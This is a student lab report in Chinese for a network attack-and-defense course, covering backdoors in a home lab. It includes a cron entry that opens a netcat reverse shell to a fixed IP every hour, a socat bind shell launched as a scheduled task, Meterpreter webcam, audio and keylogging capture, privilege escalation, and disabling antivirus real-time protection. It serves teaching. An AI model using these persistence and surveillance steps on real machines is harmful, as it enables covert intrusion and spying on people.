20232410 2025-2026-1 《网络与系统攻防技术》实验二实验报告

20232410  2025-2026-1 《网络与系统攻防技术》实验二实验报告
一、实验内容

回答问题：
(1)例举你能想到的一个后门进入到你系统中的可能方式？
比如某些钓鱼邮件或者钓鱼网站，携带着一些捆绑着后门程序的exe文件。若点击运行就有可能被植入后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式？
Windows：通过schtasks命令创建定时任务，指定后门在特定时间自动执行。
Linux：通过某些工具将后门代码注入到系统常驻进程中，借助合法进程的启动来激活。
(3)Meterpreter有哪些给你映像深刻的功能？
可以远程控制摄像头拍照并且记录电脑音频，让我措不及防。
(4)如何发现自己有系统有没有被安装后门？ 
可以通过任务管理器查看 CPU 占用异常的进程或者使用杀毒软件扫描。
二、实验过程
2.1 使用netcat获取主机操作Shell，cron启动任务
在Windows中运行nc开始监听2410端口

监听状态

kali反弹连接Windows，提供自己的shell

连接成功，主机获得虚拟机的shell

使用cron定时启动任务，在cron表的末尾添加命令50 * * * * /bin/netcat 172.20.10.3 2410 -e /bin/sh，使得在每小时的50分时都交出本机的shell控制权。

在50分后，主机得到控制权

2.2 使用socat获取主机操作Shell，任务计划启动
在Windows下，打开：控制面板->管理工具->任务计划程序，新建任务计划。选择启动的程序为socat.exe，输入参数 tcp-listen:2410 exec:cmd.exe,pty,stderr，任务调整为锁屏后启动，kali终端启动监听。结果如下

2.3 使用MSF meterpreter生成可执行文件（后门），传送到主机并运行获取主机Shell
Meterpreter是Metasploit框架中一款功能强大的后渗透攻击载荷，它支持文件操作、屏幕截图、键盘记录等功能。

将后门文件传给本机，这里使用了共享文件。先挂载共享文件夹，创建挂载点，再传输文件

进入msf控制台进行配置

得到了shell

2.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门，并尝试提权

继续调用指令，继续录音拍照等操作

调用摄像头权限如图：

尝试提权

2.5 使用MSF生成shellcode，注入到实践1中的pwn1中，获取到反弹连接Shell
使用命令生成以pwn20232410a为模板的shellcode文件20232410_pwn

输入指令msfconsole，进入msf命令行，操作同上，然后运行文件

得出结果

三、问题及解决
1.在获取摄像头权限时，系统安全中心预警，强制删除了后门文件。
解决：关闭系统安全中心的实时保护：

并且实时保护一段时间后会自动开启，需要小心。

2.后门文件在使用ncat传输到主机上时无法打开，且发现文件大小与原文件不一致。
解决：使用共享文件的方法。创建一个主机与kali之间共享的文件，通过这个文件来传输

3.在执行exploit指令时出现错误：

显示session1关闭。
解决：参考了毕同学的方法

四、心得体会

这次有关后门原理与实践的实验让我对后门的攻击操作有了更深刻的认识。我初步了解了netcat，socat与MSF meterpreter的原理与实际操作。整个实验过程中我也遇到了许多问题，包括防火墙调整，权限控制，传输工具选择与版本兼容。但在同学的经验总结与帮助下都得到了总结，让我受益颇多。